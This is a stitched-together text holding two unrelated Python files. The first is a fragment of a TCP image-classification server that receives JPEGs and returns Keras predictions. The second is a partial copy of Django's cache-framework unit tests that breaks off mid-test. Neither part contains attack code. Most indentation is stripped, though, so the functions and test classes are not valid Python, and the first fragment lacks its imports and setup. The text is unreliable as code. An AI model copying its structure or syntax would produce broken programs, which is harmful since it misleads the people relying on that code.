testimg = np.zeros((1,299,299,3)).astype('float32')/255
model.predict(testimg)
print("model is ok")
SIZE = 1024*1024
hostname = socket.gethostname()  # local hostname
ip = socket.gethostbyname(hostname)  # local IP address
port = 666
address = (ip, port)
socket01 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# AF_INET: IPv4, SOCK_STREAM: TCP
socket01.bind(address)  # bind the socket to the (ip, port) address
socket01.listen(2) # listen(backlog)
print('Socket Startup')
def recognition(img,conn,x):
Stime = time.time()
img = 'upload/'+x+".jpg"
print(img)
img1 = utils.load_img(img, target_size=(299, 299))
im_normal2 = img1.reshape(1, img1.shape[0], img1.shape[1], img1.shape[2]).astype('float32')/255
probabilities = model.predict(im_normal2)
    predict = np.argmax(probabilities, axis=1)
    i = int(predict[0])  # index of the predicted class
'''print("class: %s, acc: %.2f" % (list(load_dict.keys())[list(load_dict.values()).index(i)],
(probabilities[0][i])))'''
data_to_client = {'class': list(load_dict.keys())[list(load_dict.values()).index(i)], 'acc': (probabilities[0][i])}
conn.send(bytes(data_to_client['class'], encoding="utf8"))
print(data_to_client['class'],data_to_client['acc'])
    # write the result to the database
inserst(i, img)
Etime = time.time()
print("spend: %f" % (Etime - Stime) + 's')
return
# remove a previously saved image with the fixed name, if present
def checkFile():
    if os.path.exists('upload/image.jpg'):
        os.remove('upload/image.jpg')
        #print ("remove")
def recvImage(conn,x):
while True:
imgData = conn.recv(SIZE)
if not imgData:
break
else:
with open('upload/'+x+'.jpg', 'ab') as f:
f.write(imgData)
return x
# receive the image on a worker thread (join waits until it finishes)
def saveImage(conn,x):
checkFile()
t = threading.Thread(target = recvImage, args = (conn,x))
t.setDaemon(True)
t.start()
t.join()
def tcplink(conn, addr):
conn.send(b"1:")
print('begin write image file')
x = str(uuid.uuid1())
saveImage(conn,x)
img = "test"
recognition(img,conn,x)
conn.close()
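# Reference-only sketch of a matching client for the protocol handled by
# tcplink() above (greeting b"1:", raw JPEG bytes, half-close, then the
# predicted class name). The host, port and image path are placeholders;
# in practice this function would live in a separate client script.
def send_image(path, host='127.0.0.1', port=666):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    client.recv(16)  # server greets with b"1:" before accepting image data
    with open(path, 'rb') as f:
        client.sendall(f.read())
    client.shutdown(socket.SHUT_WR)  # empty recv() on the server ends recvImage()
    label = client.recv(1024).decode('utf8')
    client.close()
    return label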
while True:
conn, addr = socket01.accept()
t = threading.Thread(target = tcplink, args = (conn, addr))
t.start()
#print('Connected by', addr)
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import copy
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core.cache import (cache, caches, CacheKeyWarning,
InvalidCacheBackendError, DEFAULT_CACHE_ALIAS)
from django.db import connection, connections, router, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.template import Template
from django.template.response import TemplateResponse
from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings
from django.test.utils import IgnoreDeprecationWarningsMixin
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertEqual(cache.get("key"), None)
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertEqual(result, True)
self.assertEqual(cache.get("addkey1"), None)
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertEqual(cache.get("does_not_exist"), None)
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), None)
cache.delete("key1")
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertEqual(cache.has_key("hello1"), False)
self.assertEqual(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertEqual("hello2" in cache, False)
self.assertEqual("goodbye2" in cache, False)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), None)
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(cache.get("expire1"), None)
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), None)
self.assertEqual(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), None)
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
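# For illustration only: with the function above,
# custom_key_func('answer', 'cacheprefix', 2) returns 'CUSTOM-cacheprefix-2-answer'.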
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
    # `params` are test-specific overrides and `_caches_setting_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = dict((k, base.copy()) for k in _caches_setting_base.keys())
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
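# Illustrative sketch of the result (the backend name is only an example):
# caches_setting_for_tests(BACKEND='django.core.cache.backends.locmem.LocMemCache')
# returns one dict per alias in _caches_setting_base, e.g.
#     setting['v2'] == {'BACKEND': '...LocMemCache', 'VERSION': 2}
#     setting['cull'] == {'BACKEND': '...LocMemCache', 'OPTIONS': {'MAX_ENTRIES': 30}}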
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertEqual(result, False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
        # The same key doesn't conflict between caches sharing a backend when a KEY_PREFIX is set
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertEqual(cache.get("does_not_exist"), None)
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertEqual(cache.has_key("hello1"), True)
self.assertEqual(cache.has_key("goodbye1"), False)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertEqual("hello2" in cache, True)
self.assertEqual("goodbye2" in cache, False)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(cache.get("expire1"), None)
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertEqual(cache.has_key("expire3"), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertEqual(cache.get('key1'), None)
cache.add('key2', 'ham', 0)
self.assertEqual(cache.get('key2'), None)
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertEqual(cache.get('key3'), None)
self.assertEqual(cache.get('key4'), None)
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertEqual(cache.get('answer1', version=2), None)
self.assertEqual(caches['v2'].get('answer1'), None)
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertEqual(caches['v2'].get('answer1', version=2), None)
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertEqual(cache.get('answer2'), None)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertEqual(cache.get('answer3'), None)
self.assertEqual(cache.get('answer3', version=1), None)
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertEqual(caches['v2'].get('answer3', version=1), None)
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertEqual(cache.get('answer4', version=2), None)
self.assertEqual(caches['v2'].get('answer4'), None)
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertEqual(caches['v2'].get('answer4', version=2), None)
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), None)
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), None)
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), None)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), None)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), None)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.get('answer', version=3), None)
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), None)
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2', version=3), None)
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertEqual(caches['v2'].get('answer2'), None)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), None)
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertEqual(cache.get('answer', version=2), None)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertEqual(caches['v2'].get('answer2'), None)
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertEqual(caches['v2'].get('answer2', version=2), None)
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(caches['custom_key'].get('answer1'), None)
self.assertEqual(caches['custom_key2'].get('answer1'), None)
caches['custom_key'].set('answer2', 42)
self.assertEqual(cache.get('answer2'), None)
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data, None)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
